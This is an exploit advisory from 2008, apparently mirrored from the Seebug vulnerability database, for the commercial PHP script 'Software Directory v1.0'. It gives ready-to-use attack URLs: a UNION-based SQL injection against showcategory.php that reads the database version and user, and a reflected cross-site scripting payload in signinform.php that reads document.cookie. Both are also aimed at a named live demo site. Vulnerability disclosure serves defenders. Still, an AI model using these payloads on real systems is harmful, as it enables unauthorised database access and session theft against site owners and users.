============================================================================== Software Directory v1.0 (SQL/XSS) Remote SQL Vulnerability ============================================================================== [»] Script: [ Software Directory v1.0 ] [»] Language: [ PHP ] [»] Website: [ http://www.turnkeyforms.com/software-directory.html ] [»] Type: [ Commercial ] [»] Report-Date: [ 06.11.2008 ] [»] Founder: [ G4N0K <mail.ganok[at]gmail.com> ] ===[ XPL ]=== [ SQLi ] [»] http://localhost/[path]/showcategory.php?cid=-24/**/UNION/**/ALL/**/SELECT/**/1,concat(version(),0x3a,user()),3,4,5-- [ XSS ] [»] http://localhost/[path]/signinform.php?msg="><script>alert(document.cookie)</script> ===[ LIVE ]=== [ SQLi ] [»] http://demo.turnkeyforms.com/software-directory/showcategory.php?cid=-24/**/UNION/**/ALL/**/SELECT/**/1,concat(version(),0x3a,user()),3,4,5-- [ XSS ] [»] http://demo.turnkeyforms.com/software-directory/signinform.php?msg="><script>alert(document.cookie)</script> ===[ Greetz ]=== [»] ALLAH [»] Tornado2800 <Tornado2800[at]gmail.com> [»] Hussain-X <darkangel_g85[at]yahoo.com> //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) //ALLAH,forgimme... =============================================================================== exit(); //EoX ===============================================================================
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论